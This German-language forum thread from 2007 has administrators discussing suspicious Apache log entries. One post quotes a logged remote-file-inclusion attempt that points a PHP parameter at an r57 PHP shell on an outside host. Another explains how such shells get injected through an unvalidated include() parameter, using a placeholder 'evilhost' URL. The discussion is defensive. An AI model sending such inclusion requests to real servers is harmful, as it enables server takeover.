| View previous topic :: View next topic |
| Author |
Message |
Louisdor
Veteran
Joined: 14 Dec 2003
Posts: 1231
Location: im Brandenburgischen
|
 Posted: Tue Aug 14, 2007 7:13 am Post subject: Einträge in /var/log/apache2/access_log |
 |
|
MoiN!
Normalerweise habe ich in meinem Log von Apache solche Einträge drin: | Code: | 82.207.226.232 - - [01/Mar/2007:22:20:11 +0100] "GET /imgs/miuline.gif HTTP/1.1" 304 - "https://xxx.homelinux.net/" "Mozilla/5.0 (X11; U;
Linux x86_64; de; rv:1.8.1.2) Gecko/20070225 Firefox/2.0.0.2 |
Doch neuerdings tauchen immer wieder solche auf: | Code: | 222.216.28.135 - - [14/Aug/2007:05:20:13 +0200] "GET http://www.loanscandyloans.com/php/test.php?p=q1w2e3r4t5y6u7i8o9p0*a-b?hash=A88554C1BD2B7
4CA52CFF12A0050F87C07B509E9385B HTTP/1.0" 404 283
222.216.28.135 - - [14/Aug/2007:05:54:18 +0200] "GET http://www.loanscandyloans.com/php/test.php?p=q1w2e3r4t5y6u7i8o9p0*a-b?hash=A88554C1BD2B7
4CA52CFF12A0050F87C07B509E9385B HTTP/1.0" 404 283
222.216.28.135 - - [14/Aug/2007:06:35:24 +0200] "GET http://www.loanscandyloans.com/php/test.php?p=q1w2e3r4t5y6u7i8o9p0*a-b?hash=A88554C1BD2B7
4CA52CFF12A0050F87C07B509E9385B HTTP/1.0" 404 283
222.216.28.135 - - [14/Aug/2007:08:05:34 +0200] "GET http://www.loanscandyloans.com/php/test.php?p=q1w2e3r4t5y6u7i8o9p0*a-b?hash=A88554C1BD2B7
4CA52CFF12A0050F87C07B509E9385B HTTP/1.0" 404 283
222.216.28.135 - - [14/Aug/2007:08:36:12 +0200] "GET http://www.loanscandyloans.com/php/test.php?p=q1w2e3r4t5y6u7i8o9p0*a-b?hash=A88554C1BD2B7
4CA52CFF12A0050F87C07B509E9385B HTTP/1.0" 404 283 |
Hab ich da irgendwas drauf, was nicht in meinen Server gehört?
Merci & Ciao,
aleX!
PS: https://xxx.homelinux.net habe ich geändert.
_________________
"Ich bin ich." |
|
| Back to top |
|
 |
dertobi123
Retired Dev
Joined: 19 Nov 2002
Posts: 2679
Location: Oberhausen, Germany
|
| Posted: Tue Aug 14, 2007 9:29 am Post subject: |
|
|
Ne, das sind ja nur 404er - irgendwer versucht irgendwas aufzurufen, tendenziell irgendwelche Skriptkiddies. Solange nicht Webapps in veralteten Versionen mit Schwachstellen (phpMyAdmin o.ä.) unter "gebräuchlichen" Pfaden erreichbar sind völlig unkritisch.
_________________
Ganz frisch: Praxisbuch Nagios
Gentoo Linux - Die Metadistribution (2. Auflage) |
|
| Back to top |
|
|
xraver
Veteran
Joined: 20 Aug 2003
Posts: 1083
Location: Halberstadt
|
| Posted: Tue Aug 14, 2007 12:24 pm Post subject: |
|
|
Die ollen Skriptkiddies,
ich denke mal so ein Eintrag gehört dazu;
| Code: | 198.64.140.205 - - [14/Aug/2007:01:24:44 +0200] "POST #mein_server'/admin/business_inc/saveserver.php?thisdir=http://www.evilc0der.com/r57.txt? HTTP/1.0" 404 296 "http://#meinserver#/admin/business_inc/saveserver.php?thisdir=http://www.evilc0der.com/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
|
|
|
| Back to top |
|
|
Finswimmer
Bodhisattva
Joined: 02 Sep 2004
Posts: 5467
Location: Langen (Hessen), Germany
|
| Posted: Tue Aug 14, 2007 12:36 pm Post subject: |
|
|
Jemand ne Idee, was das machen könnte: http://www.evilc0der.com/r57.txt
Tobi
_________________
Bitte auf Rechtschreibung, korrekte Formatierung und Höflichkeit achten!
Danke |
|
| Back to top |
|
|
xraver
Veteran
Joined: 20 Aug 2003
Posts: 1083
Location: Halberstadt
|
| Posted: Tue Aug 14, 2007 12:52 pm Post subject: |
|
|
Keine Ahnung, ich versuche es auch gerdade raus zu bekommen.
Versucht das Script ne Shell zu öffnen?
//edit:
sowas wollte wohl jemand tun;
http://www.milw0rm.com/video/watch.php?id=29 |
|
| Back to top |
|
|
musv
Advocate
Joined: 01 Dec 2002
Posts: 3366
Location: de
|
| Posted: Tue Aug 14, 2007 2:42 pm Post subject: |
|
|
Lustig, ein Windows-Server mit Apache im Produktiveinsatz.  |
|
| Back to top |
|
|
b3cks
Veteran
Joined: 23 Mar 2004
Posts: 1481
Location: Bremen (GER)
|
| Posted: Tue Aug 14, 2007 3:31 pm Post subject: |
|
|
Ja, das eine so genannte "PHP Shell". Ist nicht direkt mit einer Shell im Sinne von "Kommandozeile" vergleichen, bietet dem User/Angreifer aber diverse Grundfunktionalitäten, um durch Verzeichnisse/Dateien zu browsen, diese zu bearbeiten, erstellen, etc. Zudem kann über PHP-Funktionen, wie exec() oder system(), versucht werden Befehle an das Betriebssystem zu senden.
Der Code einer solchen PHP-Shell wird meist auf irgendeinem Freehoster in Klartext (.txt) abgelegt und später in eine PHP-Applikation über eine Sicherheitslücke eingeschleust. Beispiel: Mittels index.php?template=home wird auf einer Website das Template home.tpl.php mittels der Funktion include() eingebunden. Wenn nun keine weitere Validierung stattfindet, kann es möglich sein eine beliebige Datei über den Parameter template anzugeben, auch http://evilhost.tld/shell.txt. Somit würde der Code der PHP-Shell in die Seite geladen und interpretiert werden. Die logische Konsequenz ist, denke ich, erkennbar.
Grundvoraussetzung für solch einen Angriff sind aber eine Fehlkonfigurationen von PHP (php.ini) sowie eine Web-Applikation (in PHP) mit einer entsprechenden Sicherheitslücke, zum einschleusen externer Dateien.
_________________
I am /root and if you see me laughing you better have a backup. |
|
| Back to top |
|
|
xraver
Veteran
Joined: 20 Aug 2003
Posts: 1083
Location: Halberstadt
|
| Posted: Tue Aug 14, 2007 8:02 pm Post subject: |
|
|
b3cks, danke für die Info.
Eben hab ich das gelesen.
Darf ich jetzt denken das PHP-Expolits nicht mehr aus Deutschland aus ausgeführt werden? |
|
| Back to top |
|
|
think4urs11
Bodhisattva
Joined: 25 Jun 2003
Posts: 6659
Location: above the cloud
|
| Posted: Tue Aug 14, 2007 8:10 pm Post subject: |
|
|
doch
du mußt lediglich eine Richter/Staatsanwalt-taugliche, wasserdichte Begründung haben das der Exploit kein reines Hackerwerkzeug sondern ein 'dual use'-Werkzeug ist, eigentlich ganz einfach 
siehe auch hier
_________________
Nothing is secure / Security is always a trade-off with usability / Do not assume anything / Trust no-one, nothing / Paranoia is your friend / Think for yourself |
|
| Back to top |
|
|
b3cks
Veteran
Joined: 23 Mar 2004
Posts: 1481
Location: Bremen (GER)
|
| Posted: Tue Aug 14, 2007 8:58 pm Post subject: |
|
|
| xraver wrote: | | b3cks, danke für die Info. |
Gern geschehen. Hab mich auch kurz gefasst.
| Quote: | | Darf ich jetzt denken das PHP-Expolits nicht mehr aus Deutschland aus ausgeführt werden? |
Selbst wenn, im Ausland interessiert das keine Sau, besonders Skript-Kiddies und diejenigen aus der CyberCrime-Scene, die mit sowas Profit machen, nicht. Das begreift auch eigentlich jeder, bis auf unsere kompetenten <hust_wuerg_roechel> Politiker...  Der einzig Dumme ist der SysAdmin hierzulande, der sein System/seine Applikation checken will und mit Pech sich deswegen rechtfertigen muss.
Leider sind die neuen Paragraphen und Gesetzeserweiterungen so schwammig, dass man nur abwarten kann, bis die ersten Urteile gefällt werden. Erst dann kann man Einschätzen, wie schlimm das Ganze wirklich ist und wie Kompetent sich Anwälte, Staatsanwaltschaften und Richter zeigen.
_________________
I am /root and if you see me laughing you better have a backup. |
|
| Back to top |
|
|
Louisdor
Veteran
Joined: 14 Dec 2003
Posts: 1231
Location: im Brandenburgischen
|
| Posted: Wed Aug 15, 2007 8:44 pm Post subject: |
|
|
| dertobi123 wrote: | | Ne, das sind ja nur 404er - irgendwer versucht irgendwas aufzurufen, tendenziell irgendwelche Skriptkiddies. Solange nicht Webapps in veralteten Versionen mit Schwachstellen (phpMyAdmin o.ä.) unter "gebräuchlichen" Pfaden erreichbar sind völlig unkritisch. |
Ok, merci, dann bin ich ja beruhigt!
Ciao,
aleX!
_________________
"Ich bin ich." |
|
| Back to top |
|
|
|
Deutsches Forum (German) 
